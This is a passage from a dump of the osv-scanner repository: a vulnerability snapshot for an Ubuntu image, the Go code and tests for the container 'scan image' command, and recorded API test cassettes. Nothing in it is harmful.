"UBUNTU-CVE-2025-62813" ] }, { "package": { "name": "util-linux", "os_package_name": "libmount1", "version": "2.37.2-4ubuntu3.4", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 1, "vulnerabilities": [ "USN-8091-1" ] }, { "package": { "name": "ncurses", "os_package_name": "libncurses6", "version": "6.3-2ubuntu0.1", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 2, "vulnerabilities": [ "UBUNTU-CVE-2023-50495", "UBUNTU-CVE-2025-6141" ] }, { "package": { "name": "ncurses", "os_package_name": "libncursesw6", "version": "6.3-2ubuntu0.1", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 2, "vulnerabilities": [ "UBUNTU-CVE-2023-50495", "UBUNTU-CVE-2025-6141" ] }, { "package": { "name": "pam", "os_package_name": "libpam-modules", "version": "1.4.0-11ubuntu2.5", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 3, "vulnerabilities": [ "USN-7580-1", "UBUNTU-CVE-2024-10041", "UBUNTU-CVE-2025-6020", "UBUNTU-CVE-2025-8941" ] }, { "package": { "name": "pam", "os_package_name": "libpam-modules-bin", "version": "1.4.0-11ubuntu2.5", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 3, "vulnerabilities": [ "USN-7580-1", "UBUNTU-CVE-2024-10041", "UBUNTU-CVE-2025-6020", "UBUNTU-CVE-2025-8941" ] }, { "package": { "name": "pam", "os_package_name": "libpam-runtime", "version": "1.4.0-11ubuntu2.5", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 3, "vulnerabilities": [ "USN-7580-1", "UBUNTU-CVE-2024-10041", "UBUNTU-CVE-2025-6020", "UBUNTU-CVE-2025-8941" ] }, { "package": { "name": "pam", "os_package_name": "libpam0g", "version": "1.4.0-11ubuntu2.5", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 3, "vulnerabilities": [ "USN-7580-1", "UBUNTU-CVE-2024-10041", "UBUNTU-CVE-2025-6020", "UBUNTU-CVE-2025-8941" ] }, { "package": { "name": "pcre2", "os_package_name": "libpcre2-8-0", "version": "10.39-3ubuntu0.1", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 1, "vulnerabilities": [ "UBUNTU-CVE-2022-41409" ] }, { "package": { "name": "pcre3", "os_package_name": "libpcre3", "version": "2:8.39-13ubuntu0.22.04.1", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 1, "vulnerabilities": [ "UBUNTU-CVE-2017-11164" ] }, { "package": { "name": "util-linux", "os_package_name": "libsmartcols1", "version": "2.37.2-4ubuntu3.4", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 1, "vulnerabilities": [ "USN-8091-1" ] }, { "package": { "name": "openssl", "os_package_name": "libssl3", "version": "3.0.2-0ubuntu1.18", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 6, "vulnerabilities": [ "USN-7980-1", "USN-7786-1", "USN-7278-1", "UBUNTU-CVE-2024-13176", "UBUNTU-CVE-2024-41996", "UBUNTU-CVE-2024-9143", "UBUNTU-CVE-2025-15467", "UBUNTU-CVE-2025-27587", "UBUNTU-CVE-2025-68160", "UBUNTU-CVE-2025-69418", "UBUNTU-CVE-2025-69419", "UBUNTU-CVE-2025-69420", "UBUNTU-CVE-2025-69421", "UBUNTU-CVE-2025-9230", "UBUNTU-CVE-2026-22795", "UBUNTU-CVE-2026-22796", "UBUNTU-CVE-2026-2673" ] }, { "package": { "name": "gcc-12", "os_package_name": "libstdc++6", "version": "12.3.0-1ubuntu1~22.04", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 2, "vulnerabilities": [ "USN-7700-1", "UBUNTU-CVE-2022-27943", "UBUNTU-CVE-2023-4039" ] }, { "package": { "name": "systemd", "os_package_name": "libsystemd0", "version": "249.11-0ubuntu3.12", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 3, "vulnerabilities": [ "USN-7559-1", "UBUNTU-CVE-2023-7008", "UBUNTU-CVE-2025-4598", "UBUNTU-CVE-2026-4105" ] }, { "package": { "name": "libtasn1-6", "os_package_name": "libtasn1-6", "version": "4.18.0-4build1", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 2, "vulnerabilities": [ "USN-7954-1", "USN-7275-1", "UBUNTU-CVE-2021-46848", "UBUNTU-CVE-2024-12133", "UBUNTU-CVE-2025-13151" ] }, { "package": { "name": "ncurses", "os_package_name": "libtinfo6", "version": "6.3-2ubuntu0.1", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 2, "vulnerabilities": [ "UBUNTU-CVE-2023-50495", "UBUNTU-CVE-2025-6141" ] }, { "package": { "name": "systemd", "os_package_name": "libudev1", "version": "249.11-0ubuntu3.12", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 3, "vulnerabilities": [ "USN-7559-1", "UBUNTU-CVE-2023-7008", "UBUNTU-CVE-2025-4598", "UBUNTU-CVE-2026-4105" ] }, { "package": { "name": "util-linux", "os_package_name": "libuuid1", "version": "2.37.2-4ubuntu3.4", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 1, "vulnerabilities": [ "USN-8091-1" ] }, { "package": { "name": "libzstd", "os_package_name": "libzstd1", "version": "1.4.8+dfsg-3build1", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 1, "vulnerabilities": [ "UBUNTU-CVE-2022-4899" ] }, { "package": { "name": "shadow", "os_package_name": "login", "version": "1:4.8.1-2ubuntu2.2", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 2, "vulnerabilities": [ "UBUNTU-CVE-2023-29383", "UBUNTU-CVE-2024-56433" ] }, { "package": { "name": "util-linux", "os_package_name": "mount", "version": "2.37.2-4ubuntu3.4", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 1, "vulnerabilities": [ "USN-8091-1" ] }, { "package": { "name": "ncurses", "os_package_name": "ncurses-base", "version": "6.3-2ubuntu0.1", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 2, "vulnerabilities": [ "UBUNTU-CVE-2023-50495", "UBUNTU-CVE-2025-6141" ] }, { "package": { "name": "ncurses", "os_package_name": "ncurses-bin", "version": "6.3-2ubuntu0.1", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 2, "vulnerabilities": [ "UBUNTU-CVE-2023-50495", "UBUNTU-CVE-2025-6141" ] }, { "package": { "name": "shadow", "os_package_name": "passwd", "version": "1:4.8.1-2ubuntu2.2", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 2, "vulnerabilities": [ "UBUNTU-CVE-2023-29383", "UBUNTU-CVE-2024-56433" ] }, { "package": { "name": "perl", "os_package_name": "perl-base", "version": "5.34.0-3ubuntu1.3", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 4, "vulnerabilities": [ "USN-7434-1", "USN-7678-1", "UBUNTU-CVE-2023-31486", "UBUNTU-CVE-2023-47039", "UBUNTU-CVE-2024-56406", "UBUNTU-CVE-2025-40909" ] }, { "package": { "name": "tar", "os_package_name": "tar", "version": "1.34+dfsg-1ubuntu0.1.22.04.2", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 1, "vulnerabilities": [ "UBUNTU-CVE-2025-45582" ] }, { "package": { "name": "util-linux", "os_package_name": "util-linux", "version": "2.37.2-4ubuntu3.4", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 1, "vulnerabilities": [ "USN-8091-1" ] }, { "package": { "name": "zlib", "os_package_name": "zlib1g", "version": "1:1.2.11.dfsg-2ubuntu9.2", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 1, "vulnerabilities": [ "UBUNTU-CVE-2026-27171" ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": null } }, "image_metadata": { "os": "Ubuntu 22.04.5 LTS", "layer_metadata": [ { "diff_id": "", "command": "/bin/sh -c #(nop) ARG RELEASE", "is_empty": true, "base_image_index": 2 }, { "diff_id": "", "command": "/bin/sh -c #(nop) ARG LAUNCHPAD_BUILD_ARCH", "is_empty": true, "base_image_index": 2 }, { "diff_id": "", "command": "/bin/sh -c #(nop) LABEL org.opencontainers.image.ref.name=ubuntu", "is_empty": true, "base_image_index": 1 }, { "diff_id": "", "command": "/bin/sh -c #(nop) LABEL org.opencontainers.image.version=22.04", "is_empty": true, "base_image_index": 1 }, { "diff_id": "sha256:...", "command": "/bin/sh -c #(nop) ADD file:1b6c8c9518be42fa2afe5e241ca31677fce58d27cdfa88baa91a65a259be3637 in / ", "is_empty": false, "base_image_index": 1 }, { "diff_id": "", "command": "/bin/sh -c #(nop) CMD [/"/bin/bash/"]", "is_empty": true, "base_image_index": 1 }, { "diff_id": "sha256:...", "command": "COPY ./sample-pkgs/fzf_0.29.0-1ubuntu0.1_amd64.deb /tmp/fzf_0.29.0-1ubuntu0.1_amd64.deb # buildkit", "is_empty": false, "base_image_index": 0 }, { "diff_id": "sha256:...", "command": "RUN /bin/sh -c dpkg -i /tmp/fzf_0.29.0-1ubuntu0.1_amd64.deb /u0026/u0026 rm /tmp/fzf_0.29.0-1ubuntu0.1_amd64.deb # buildkit", "is_empty": false, "base_image_index": 0 } ], "base_images": [ {}, { "name": "ubuntu", "tags": null }, { "name": "laurentsogeti/pod_showname_formation_ckad", "tags": null } ] } } --- [TestCommand_OCIImage_JSONFormat/ubuntu_image_with_go_OS_packages_json - 2] Scanning local image tarball "./testdata/test-ubuntu-with-packages.tar" --- ================================================ FILE: cmd/osv-scanner/scan/image/command.go ================================================ // Package image implements the `image` subcommand of the `scan` command. package image import ( "context" "errors" "fmt" "io" "net/http" "os" "path/filepath" "strings" "github.com/google/osv-scanner/v2/cmd/osv-scanner/internal/helper" "github.com/google/osv-scanner/v2/internal/cmdlogger" "github.com/google/osv-scanner/v2/internal/version" "github.com/google/osv-scanner/v2/pkg/models" "github.com/google/osv-scanner/v2/pkg/osvscanner" "github.com/urfave/cli/v3" ) func Command(stdout, stderr io.Writer, client *http.Client) *cli.Command { return &cli.Command{ Name: "image", Usage: "detects vulnerabilities in a container image's dependencies, pulling the image if it's not found locally", Description: "detects vulnerabilities in a container image's dependencies, pulling the image if it's not found locally", Flags: append([]cli.Flag{ &cli.BoolFlag{ Name: "archive", Usage: "input a local archive image (e.g. a tar file)", }, }, helper.BuildCommonScanFlags([]string{"artifact"})...), ArgsUsage: "[image imageNameWithTag]", Action: func(ctx context.Context, cmd *cli.Command) error { return action(ctx, cmd, stdout, stderr, client) }, } } func action(_ context.Context, cmd *cli.Command, stdout, stderr io.Writer, client *http.Client) error { if cmd.Args().Len() == 0 { return errors.New("please provide an image name or see the help document") } isImageArchive := cmd.Bool("archive") image := cmd.Args().First() if !isImageArchive && !strings.Contains(image, ":") { return fmt.Errorf("%q is not a tagged image name", image) } format := cmd.String("format") outputPath := cmd.String("output-file") if outputPath == "" { outputPath = cmd.String("output") } serve := cmd.Bool("serve") if serve { format = "html" if outputPath == "" { // Create a temporary directory tmpDir, err := os.MkdirTemp("", "osv-scanner-result") if err != nil { return fmt.Errorf("failed creating temporary directory: %w\n"+ "Please use `--output-file result.html` to specify the output path", err) } // Remove the created temporary directory after defer os.RemoveAll(tmpDir) outputPath = filepath.Join(tmpDir, "index.html") } } scanLicensesAllowlist, err := helper.GetScanLicensesAllowlist(cmd) if err != nil { return err } scannerAction := helper.GetCommonScannerActions(cmd, scanLicensesAllowlist) scannerAction.Image = cmd.Args().First() scannerAction.IsImageArchive = cmd.Bool("archive") scannerAction.ExperimentalScannerActions = helper.GetExperimentalScannerActions(cmd, client) scannerAction.RequestUserAgent = "osv-scanner_scan-image/" + version.OSVVersion var vulnResult models.VulnerabilityResults //nolint:contextcheck // passing the context in would be a breaking change vulnResult, err = osvscanner.DoContainerScan(scannerAction) if cmd.Bool("allow-no-lockfiles") && errors.Is(err, osvscanner.ErrNoPackagesFound) { cmdlogger.Warnf("No package sources found") err = nil } if err != nil && !errors.Is(err, osvscanner.ErrVulnerabilitiesFound) { return err } if errPrint := helper.PrintResult(stdout, stderr, outputPath, format, &vulnResult, scannerAction.ShowAllVulns); errPrint != nil { return fmt.Errorf("failed to write output: %w", errPrint) } // Auto-open outputted HTML file for users. if outputPath != "" { if serve { helper.ServeHTML(outputPath) } else if format == "html" { cmdlogger.Infof("HTML output available at: %s", outputPath) } } // This may be nil. return err } ================================================ FILE: cmd/osv-scanner/scan/image/command_test.go ================================================ package image_test import ( "errors" "os" "runtime" "strings" "testing" "github.com/google/osv-scanner/v2/cmd/osv-scanner/internal/testcmd" "github.com/google/osv-scanner/v2/internal/testutility" ) func TestCommand_ExplicitExtractors_WithDefaults(t *testing.T) { t.Parallel() testutility.SkipIfNotAcceptanceTesting(t, "Requires docker to build the images") client := testcmd.InsertCassette(t) tests := []testcmd.Case{ { Name: "add_extractors", Args: []string{ "", "image", "--archive", "--experimental-plugins=sbom/spdx", "--experimental-plugins=sbom/cdx", "testdata/test-alpine-sbom.tar", }, Exit: 1, }, { Name: "extractors_cancelled_out", Args: []string{ "", "image", "--archive", "--experimental-plugins=sbom/spdx", "--experimental-plugins=sbom/cdx", "--experimental-disable-plugins=sbom", "testdata/test-alpine-sbom.tar", }, Exit: 1, }, { Name: "extractors_cancelled_out_with_presets", Args: []string{ "", "image", "--archive", "--experimental-plugins=sbom", "--experimental-disable-plugins=sbom", "testdata/test-alpine-sbom.tar", }, Exit: 1, }, { Name: "extractors_cancelled_out", Args: []string{ "", "image", "--archive", "--experimental-plugins=sbom/spdx,sbom/cdx", "--experimental-disable-plugins=sbom", "testdata/test-alpine-sbom.tar", }, Exit: 1, }, } for _, tt := range tests { t.Run(tt.Name, func(t *testing.T) { t.Parallel() tt.HTTPClient = testcmd.WithTestNameHeader(t, *client) testcmd.RunAndMatchSnapshots(t, tt) }) } } func TestCommand_ExplicitExtractors_WithoutDefaults(t *testing.T) { t.Parallel() testutility.SkipIfNotAcceptanceTesting(t, "Requires docker to build the images") client := testcmd.InsertCassette(t) tests := []testcmd.Case{ { Name: "add_extractors", Args: []string{ "", "image", "--archive", "--experimental-plugins=sbom/spdx", "--experimental-plugins=sbom/cdx", "--experimental-no-default-plugins", "testdata/test-alpine-sbom.tar", }, Exit: 1, }, { Name: "extractors_cancelled_out", Args: []string{ "", "image", "--archive", "--experimental-plugins=sbom/spdx", "--experimental-plugins=sbom/cdx", "--experimental-disable-plugins=sbom", "--experimental-no-default-plugins", "testdata/test-alpine-sbom.tar", }, Exit: 127, }, { Name: "extractors_cancelled_out_with_presets", Args: []string{ "", "image", "--archive", "--experimental-plugins=sbom", "--experimental-disable-plugins=sbom", "--experimental-no-default-plugins", "testdata/test-alpine-sbom.tar", }, Exit: 127, }, { Name: "extractors_cancelled_out", Args: []string{ "", "image", "--archive", "--experimental-plugins=sbom/spdx,sbom/cdx", "--experimental-disable-plugins=sbom", "--experimental-no-default-plugins", "testdata/test-alpine-sbom.tar", }, Exit: 127, }, } for _, tt := range tests { t.Run(tt.Name, func(t *testing.T) { t.Parallel() tt.HTTPClient = testcmd.WithTestNameHeader(t, *client) testcmd.RunAndMatchSnapshots(t, tt) }) } } func TestCommand_Docker(t *testing.T) { t.Parallel() testutility.SkipIfNotAcceptanceTesting(t, "Requires docker (also takes a long time to pull images)") testutility.SkipIfShort(t) client := testcmd.InsertCassette(t) tests := []testcmd.Case{ { Name: "no_image_argument", Args: []string{"", "image"}, Exit: 127, }, { Name: "Fake_alpine_image", Args: []string{"", "image", "alpine:non-existent-tag"}, Exit: 127, }, { Name: "Fake_image_entirely", Args: []string{"", "image", "this-image-definitely-does-not-exist-abcde:with-tag"}, Exit: 127, }, { Name: "Real_empty_image_with_no_tag,_invalid_scan_target", Args: []string{"", "image", "hello-world"}, Exit: 127, // Invalid scan target }, { Name: "Real_empty_image_with_tag", Args: []string{"", "image", "hello-world:linux"}, Exit: 128, // No package found }, { Name: "real_empty_image_with_tag_and_allow_no_lockfiles_flag", Args: []string{"", "image", "--allow-no-lockfiles", "hello-world:linux"}, Exit: 0, }, { Name: "Real_Alpine_image", Args: []string{"", "image", "alpine:3.18.9"}, Exit: 1, }, { // this will result in an error about not being able to find any package sources // since we've requested the os/apk extractor disabled, and there's nothing else // in the image that we support extracting Name: "real_alpine_image_without_apk_extractor_enabled", Args: []string{"", "image", "--experimental-disable-plugins=os/apk", "alpine:3.18.9"}, Exit: 128, }, } for _, tt := range tests { t.Run(tt.Name, func(t *testing.T) { t.Parallel() // Only test on linux, and mac/windows CI/CD does not come with docker preinstalled if runtime.GOOS != "linux" { testutility.Skip(t, "Skipping Docker-based test as only Linux has Docker installed in CI") } tt.HTTPClient = testcmd.WithTestNameHeader(t, *client) testcmd.RunAndMatchSnapshots(t, tt) }) } } func TestCommand_OCIImage(t *testing.T) { t.Parallel() testutility.SkipIfNotAcceptanceTesting(t, "Requires docker to build the images") client := testcmd.InsertCassette(t) tests := []testcmd.Case{ { Name: "Invalid_path", Args: []string{"", "image", "--archive", "../../testdata/locks-manyoci-image/no-file-here.tar"}, Exit: 127, }, { Name: "Alpine_3.10_image_tar_with_3.18_version_file", Args: []string{"", "image", "--archive", "./testdata/test-alpine.tar"}, Exit: 1, }, { Name: "Empty_Ubuntu_22.04_image_tar", Args: []string{"", "image", "--archive", "./testdata/test-ubuntu.tar"}, Exit: 1, }, { Name: "Empty_Ubuntu_22.04_image_tar_with_unimportant_vulns", Args: []string{"", "image", "--all-vulns", "--archive", "./testdata/test-ubuntu.tar"}, Exit: 1, }, { Name: "Empty_Ubuntu_20.04_image_tar_with_only_unimportant_vulns_shown", Args: []string{"", "image", "--archive", "--all-vulns", "--config=./testdata/ubuntu20-04-unimportant-config.toml", "--all-vulns", "./testdata/test-ubuntu-20-04.tar"}, Exit: 1, }, { // This tests that unimportant vulns are hidden properly // If the test is failing (reporting new important vulns), add the package that introduced the vuln as ignore=true to the config.toml // The package with unimportant vulns is pcre3, so if a new vulnerability appears for that package, don't ignore the entire package, just ignore the important vulnerability specifically. Name: "Empty_Ubuntu_20.04_image_tar_with_no_vulns_shown", Args: []string{"", "image", "--archive", "--config=./testdata/ubuntu20-04-unimportant-config.toml", "./testdata/test-ubuntu-20-04.tar"}, Exit: 0, }, { // This tests that the fzf go binary is not being reported because it's a OS package Name: "Scanning_Ubuntu_image_with_go_OS_packages_json", Args: []string{"", "image", "--archive", "./testdata/test-ubuntu-with-packages.tar"}, Exit: 1, }, { Name: "Scanning_python_image_with_some_packages", Args: []string{"", "image", "--archive", "./testdata/test-python-full.tar"}, Exit: 1, }, { Name: "Scanning_python_image_with_no_packages", Args: []string{"", "image", "--archive", "./testdata/test-python-empty.tar"}, Exit: 1, }, { Name: "Scanning_java_image_with_some_packages", Args: []string{"", "image", "--archive", "./testdata/test-java-full.tar"}, Exit: 1, }, { Name: "scanning_node_modules_using_npm_with_no_packages", Args: []string{"", "image", "--archive", "./testdata/test-node_modules-npm-empty.tar"}, Exit: 1, }, { Name: "scanning_node_modules_using_npm_with_some_packages", Args: []string{"", "image", "--archive", "./testdata/test-node_modules-npm-full.tar"}, Exit: 1, }, { Name: "scanning_node_modules_using_yarn_with_no_packages", Args: []string{"", "image", "--archive", "./testdata/test-node_modules-yarn-empty.tar"}, Exit: 1, }, { Name: "scanning_node_modules_using_yarn_with_some_packages", Args: []string{"", "image", "--archive", "./testdata/test-node_modules-yarn-full.tar"}, Exit: 1, }, { Name: "scanning_node_modules_using_pnpm_with_no_packages", Args: []string{"", "image", "--archive", "./testdata/test-node_modules-pnpm-empty.tar"}, Exit: 1, }, { Name: "scanning_node_modules_using_pnpm_with_some_packages", Args: []string{"", "image", "--archive", "./testdata/test-node_modules-pnpm-full.tar"}, Exit: 1, }, { Name: "scanning_image_with_go_binary", Args: []string{"", "image", "--archive", "./testdata/test-package-tracing.tar"}, Exit: 1, }, { Name: "scanning_insecure_alpine_image_without_detectors", Args: []string{ "", "image", "--archive", "./testdata/test-alpine-etcshadow.tar", }, Exit: 1, }, { Name: "scanning_insecure_alpine_image_with_specific_detector_enabled", Args: []string{ "", "image", "--experimental-plugins", "os/apk", "--experimental-plugins", "weakcredentials/etcshadow", "--archive", "./testdata/test-alpine-etcshadow.tar", }, Exit: 1, }, { Name: "scanning_insecure_alpine_image_with_specific_detector_disabled", Args: []string{ "", "image", "--experimental-plugins", "os/apk", "--experimental-plugins", "weakcreds", "--experimental-disable-plugins", "weakcredentials/etcshadow", "--archive", "./testdata/test-alpine-etcshadow.tar", }, Exit: 1, }, { Name: "scanning_insecure_alpine_image_with_detector_preset", Args: []string{ "", "image", "--experimental-plugins", "os/apk", "--experimental-plugins", "weakcreds", "--archive", "./testdata/test-alpine-etcshadow.tar", }, Exit: 1, }, } for _, tt := range tests { t.Run(tt.Name, func(t *testing.T) { t.Parallel() // point out that we need the images to be built and saved separately for _, arg := range tt.Args { if strings.HasPrefix(arg, "./testdata/") && strings.HasSuffix(arg, ".tar") { if _, err := os.Stat(arg); errors.Is(err, os.ErrNotExist) { t.Fatalf("%s does not exist - have you run scripts/build_test_images.sh?", arg) } } } tt.HTTPClient = testcmd.WithTestNameHeader(t, *client) testcmd.RunAndMatchSnapshots(t, tt) }) } } func TestCommand_OCIImage_JSONFormat(t *testing.T) { t.Parallel() testutility.SkipIfNotAcceptanceTesting(t, "Requires docker to build the images") client := testcmd.InsertCassette(t) tests := []testcmd.Case{ { Name: "Scanning_python_image_with_some_packages", Args: []string{"", "image", "--archive", "--format=json", "./testdata/test-python-full.tar"}, Exit: 1, ReplaceRules: []testutility.JSONReplaceRule{ testutility.GroupsAsArrayLen, testutility.OnlyIDVulnsRule, testutility.OnlyFirstBaseImage, testutility.AnyDiffID, testutility.NormalizeHistoryCommand, testutility.ShortenHistoryCommandLength, }, }, { Name: "scanning_node_modules_using_npm_with_some_packages", Args: []string{"", "image", "--archive", "--format=json", "./testdata/test-node_modules-npm-full.tar"}, Exit: 1, ReplaceRules: []testutility.JSONReplaceRule{ testutility.GroupsAsArrayLen, testutility.OnlyIDVulnsRule, testutility.OnlyFirstBaseImage, testutility.AnyDiffID, testutility.NormalizeHistoryCommand, testutility.ShortenHistoryCommandLength, }, }, { Name: "scanning_image_with_go_binary", Args: []string{"", "image", "--archive", "--all-packages", "--format=json", "./testdata/test-go-binary.tar"}, Exit: 1, ReplaceRules: []testutility.JSONReplaceRule{ testutility.GroupsAsArrayLen, testutility.OnlyIDVulnsRule, testutility.OnlyFirstBaseImage, testutility.AnyDiffID, testutility.NormalizeHistoryCommand, }, }, { Name: "scanning_ubuntu_image", Args: []string{"", "image", "--archive", "--format=json", "./testdata/test-ubuntu.tar"}, Exit: 1, ReplaceRules: []testutility.JSONReplaceRule{ testutility.GroupsAsArrayLen, testutility.OnlyIDVulnsRule, testutility.OnlyFirstBaseImage, testutility.AnyDiffID, }, }, { // This tests that the fzf go binary is not being reported because it's a OS package Name: "ubuntu_image_with_go_OS_packages_json", Args: []string{"", "image", "--archive", "--format=json", "./testdata/test-ubuntu-with-packages.tar"}, Exit: 1, ReplaceRules: []testutility.JSONReplaceRule{ testutility.GroupsAsArrayLen, testutility.OnlyIDVulnsRule, testutility.OnlyFirstBaseImage, testutility.AnyDiffID, }, }, { Name: "scanning_insecure_alpine_image_with_specific_detector_enabled", Args: []string{ "", "image", "--format=json", "--experimental-plugins", "os/apk", "--experimental-plugins", "weakcredentials/etcshadow", "--archive", "./testdata/test-alpine-etcshadow.tar", }, Exit: 1, ReplaceRules: []testutility.JSONReplaceRule{ testutility.GroupsAsArrayLen, testutility.OnlyIDVulnsRule, testutility.OnlyFirstBaseImage, testutility.AnyDiffID, }, }, { Name: "scanning_insecure_alpine_image_with_detector_preset", Args: []string{ "", "image", "--format=json", "--experimental-plugins", "os/apk", "--experimental-plugins", "weakcreds", "--archive", "./testdata/test-alpine-etcshadow.tar", }, Exit: 1, ReplaceRules: []testutility.JSONReplaceRule{ testutility.GroupsAsArrayLen, testutility.OnlyIDVulnsRule, testutility.OnlyFirstBaseImage, testutility.AnyDiffID, }, }, { Name: "scanning_image_with_deprecated_packages", Args: []string{ "", "image", "--format=json", "--experimental-flag-deprecated-packages", "--archive", "./testdata/test-image-with-deprecated.tar", }, Exit: 1, ReplaceRules: []testutility.JSONReplaceRule{ testutility.GroupsAsArrayLen, testutility.OnlyIDVulnsRule, testutility.OnlyFirstBaseImage, testutility.AnyDiffID, }, }, } for _, tt := range tests { t.Run(tt.Name, func(t *testing.T) { t.Parallel() // point out that we need the images to be built and saved separately for _, arg := range tt.Args { if strings.HasPrefix(arg, "./testdata/") && strings.HasSuffix(arg, ".tar") { if _, err := os.Stat(arg); errors.Is(err, os.ErrNotExist) { t.Fatalf("%s does not exist - have you run scripts/build_test_images.sh?", arg) } } } tt.HTTPClient = testcmd.WithTestNameHeader(t, *client) testcmd.RunAndMatchSnapshots(t, tt) }) } } func TestCommand_HtmlFile(t *testing.T) { t.Parallel() testutility.SkipIfNotAcceptanceTesting(t, "Needs built container images") testDir := testutility.CreateTestDir(t) client := testcmd.InsertCassette(t) _, stderr := testcmd.RunAndNormalize(t, testcmd.Case{ Name: "one_specific_supported_lockfile", Args: []string{"", "image", "--format=html", "--output-file", testDir + "/report.html", "--archive", "./testdata/test-alpine.tar", }, Exit: 1, HTTPClient: testcmd.WithTestNameHeader(t, *client), }) testutility.NewSnapshot().WithWindowsReplacements(map[string]string{ "CreateFile": "stat", }).MatchText(t, stderr) _, err := os.Stat(testDir + "/report.html") if err != nil { t.Errorf("Unexpected %v", err) } } ================================================ FILE: cmd/osv-scanner/scan/image/testdata/alpine-3.18-alpine-release ================================================ 3.18.1 ================================================ FILE: cmd/osv-scanner/scan/image/testdata/alpine-3.18-os-release ================================================ / # cat /etc/os-release NAME="Alpine Linux" ID=alpine VERSION_ID=3.18.1 PRETTY_NAME="Alpine Linux v3.18" HOME_URL="https://alpinelinux.org/" BUG_REPORT_URL="https://gitlab.alpinelinux.org/alpine/aports/-/issues" ================================================ FILE: cmd/osv-scanner/scan/image/testdata/cassettes/TestCommand_Docker.yaml ================================================ --- version: 2 interactions: - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 2036 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Alpine:v3.18", "name": "alpine-baselayout" }, "version": "3.4.3-r1" }, { "package": { "ecosystem": "Alpine:v3.18", "name": "alpine-baselayout" }, "version": "3.4.3-r1" }, { "package": { "ecosystem": "Alpine:v3.18", "name": "alpine-keys" }, "version": "2.4-r1" }, { "package": { "ecosystem": "Alpine:v3.18", "name": "apk-tools" }, "version": "2.14.4-r0" }, { "package": { "ecosystem": "Alpine:v3.18", "name": "busybox" }, "version": "1.36.1-r7" }, { "package": { "ecosystem": "Alpine:v3.18", "name": "busybox" }, "version": "1.36.1-r7" }, { "package": { "ecosystem": "Alpine:v3.18", "name": "ca-certificates" }, "version": "20240226-r0" }, { "package": { "ecosystem": "Alpine:v3.18", "name": "libc-dev" }, "version": "0.7.2-r5" }, { "package": { "ecosystem": "Alpine:v3.18", "name": "openssl" }, "version": "3.1.7-r0" }, { "package": { "ecosystem": "Alpine:v3.18", "name": "openssl" }, "version": "3.1.7-r0" }, { "package": { "ecosystem": "Alpine:v3.18", "name": "musl" }, "version": "1.2.4-r2" }, { "package": { "ecosystem": "Alpine:v3.18", "name": "musl" }, "version": "1.2.4-r2" }, { "package": { "ecosystem": "Alpine:v3.18", "name": "pax-utils" }, "version": "1.3.7-r1" }, { "package": { "ecosystem": "Alpine:v3.18", "name": "busybox" }, "version": "1.36.1-r7" }, { "package": { "ecosystem": "Alpine:v3.18", "name": "zlib" }, "version": "1.2.13-r1" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_Docker/Real_Alpine_image url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 524 body: | { "results": [ {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2024-13176", "modified": "2026-02-08T14:17:02.498117Z" }, { "id": "ALPINE-CVE-2024-9143", "modified": "2025-12-03T22:57:50.413061Z" } ] }, { "vulns": [ { "id": "ALPINE-CVE-2024-13176", "modified": "2026-02-08T14:17:02.498117Z" }, { "id": "ALPINE-CVE-2024-9143", "modified": "2025-12-03T22:57:50.413061Z" } ] }, { "vulns": [ { "id": "ALPINE-CVE-2025-26519", "modified": "2025-12-11T11:16:21.978419Z" } ] }, { "vulns": [ { "id": "ALPINE-CVE-2025-26519", "modified": "2025-12-11T11:16:21.978419Z" } ] }, {}, {}, {} ] } headers: Content-Length: - "524" Content-Type: - application/json status: 200 OK code: 200 duration: 0s ================================================ FILE: cmd/osv-scanner/scan/image/testdata/cassettes/TestCommand_ExplicitExtractors_WithDefaults.yaml ================================================ --- version: 2 interactions: - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 2031 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Alpine:v3.10", "name": "alpine-baselayout" }, "version": "3.1.2-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "alpine-keys" }, "version": "2.1-r2" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "apk-tools" }, 